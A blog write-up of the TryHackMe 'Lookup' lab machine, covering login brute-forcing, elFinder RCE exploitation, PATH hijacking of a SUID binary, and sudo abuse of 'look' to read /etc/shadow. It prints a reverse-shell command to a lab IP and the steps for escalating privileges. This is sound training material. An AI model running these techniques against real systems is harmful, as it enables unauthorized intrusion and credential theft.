Lookup Writeup (TryHackMe Easy Machine)

-

Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices.


Overview

Lookup is an easy Linux machine from TryHackMe. This is beginner-friendly box, testing your most basic cybersecurity skills. Challenges in this room are very common in other CTFs as well.

We start with login page brute-forcing, leading to gaining access to “elFinder” file manager. We exploit known RCE vulnerability and get an initial foothold on the machine.

Once inside, we modify the PATH variable and execute our malicious script, leading to compromising another user. Finally, we abuse sudo permission over “look” binary and get root.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.194.175 -T5                   
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 15:27 EDT
Warning: 10.10.194.175 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.194.175
Host is up (0.063s latency).
Not shown: 971 closed tcp ports (reset), 27 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   124.85 ms 10.9.0.1
2   124.90 ms 10.10.194.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

The Nmap scan showed 2 open ports. Port 22 for SSH and port 80 for Apache HTTP server. Don’t forget to add “lookup.thm” domain to your “/etc/hosts” file.


Web enumeration

When I visited the website, I was greeted with a login form. Close source code inspection uncovered that there’s PHP running in the background, too.


I ran both Gobuster and FFuF to perform directory and subdomain enumeration, but got no results back. After that, I tried to use some common credentials to test the functionality. I found out that there’s a difference in the server response for existing and non-existing user.

non-existing username, response showing “wrong username”

For example, user “admin” seems to be present on the web server.

existing username, response showing “wrong password”


Based on this finding, it’s possible to brute-force the password. I used online password cracking tool called Hydra, which has password spraying capabilities as well.

Hydra screamed with a finding. But when I tried these credentials, nothing happened.

That’s very weird, showing response for wrong username too. In desperation, I tried password spraying with Hydra to see if that would do anything, and it did.

I got a match with another user named “jose”. Hopefully, this one will work.


Exploiting RCE in elFinder & getting reverse shell

When I tried to login as “jose”, I got redirected to different subdomain “files.lookup.thm”.

I got an error. That’s because the browser doesn’t know how to get to that website. We have to add “files.lookup.thm” subdomain to our “/etc/hosts” file for the website to load properly.


After that, I was greeted with “elFinder”, which seemed to be a file manager application.

elFinder is an open-source web-based file manager. It’s designed to allow users to manage files and folders on a server through a graphical interface similar to a desktop file manager like Windows Explorer or macOS Finder — but accessible in a browser. (ChatGPT)

There were also files like “root.txt” and “admin.txt”, but with seemingly random content.

stored files showing seemingly random content

I was digging for a bit and found the version of used elFinder. It was version 2.1.47.


I did some research on “elFinder 2.1.47” and found a PHP connector RCE exploit. I found this Github repository with Python exploit: https://github.com/hadrian3689/elFinder_2.1.47_php_connector_rce.

I downloaded the exploit, provided necessary parameters and ran it. And I got the shell.

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py -t "http://files.lookup.thm/elFinder/" -lh 10.9.2.141 -lp 1234
CVE-2019-9194 elFinder 2.1.47 - PHP connector Command Injection
Uploading image
Gettin file hash: l1_cnNlLmpwZztlY2hvIDNjM2Y3MDY4NzAyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzMjI1ZDI5M2IyMDNmM2UwYSB8eHhkIC1yIC1wID4gcnNlLnBocDsgIy5qcGc
Rotating image
Requesting shell at http://files.lookup.thm/elFinder/php/rse.php?c=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.9.2.141/1234%200>%261'


Modifying PATH variable to execute malicious script & getting user flag

I checked the SUID binaries and found unusual binary called “pwm”.

I ran the “pwm” script, which ran “id” command to extract my username and tried to print my “.passwords” file. User “think” has such file in his home directory. Maybe another password list.

www-data@lookup:/$ pwm
pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found


Inspecting the binary with “strings”, we can deduce that the “id” command is being ran without the absolute path (like “/usr/sbin/id”). When not providing absolute path, system looks into directories specified in “PATH” environment variable to search for this binary.

We can abuse this by modifying this PATH variable to point to “/tmp” directory as well, where we create our malicious “id” script, which simply prints the UID of user “think”. That should give us his “.passwords” file.

Firstly, I created my malicious “id” binary inside the “/tmp” directory.

www-data@lookup:/tmp$ echo -e '#!/bin/bash\necho "uid=1000(think)"' > id
echo -e '#!/bin/bash\necho "uid=1000(think)"' > id
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo "uid=1000(think)"
www-data@lookup:/tmp$ chmod +x id
chmod +x id

Secondly, I appended the “/tmp” directory to the PATH variable.

www-data@lookup:/$ export PATH="/tmp:$PATH"  
export PATH="/tmp:$PATH"
www-data@lookup:/$ $PATH
$PATH
bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory

Finally, I ran the “pwm” script. As expected, it gave me think’s password list.


I used Hydra again to brute-force the SSH with user “think”. And I got a match.

I logged in as “think” via SSH. User flag can be grabbed easily now.


Abusing sudo permission over “look” binary & getting root flag

I immediately ran “sudo -l” to check my user’s sudo permissions. I could run binary “look” as sudo.

think@lookup:~$ sudo -l
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

I tested this binary’s functionality to get better understanding of it. It seemed to depend on specific file “/usr/share/dict/words”, that was not found.

think@lookup:~$ sudo /usr/bin/look
usage: look [-bdf] [-t char] string [file ...]
think@lookup:~$ sudo /usr/bin/look abcdef
look: /usr/share/dict/words: No such file or directory


I took me a moment to realize that “look” is actually common pre-installed binary on Linux. I went to GTFObins, which shows you privilege escalation techniques on common Linux binaries.

I just had to run it with empty string and whatever file I wanted to read. I chose “/etc/shadow”.

With this, you can read the root flag. You can also root the machine by displaying root’s private key.


Summary

Lookup is an easy machine from TryHackMe. This box challenges you with common CTF problems. Abusing sudo permissions, modifying PATH variable, exploiting RCE in known software and login brute-forcing are things you can practice on this machine. I liked all the different stages of this box, but got little bored with all the brute-forcing, which is definitely common in cybersecurity, but not really fun. Recommending to anyone who starts to get started in cybersecurity and CTFs, maybe little too easy for experienced people.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more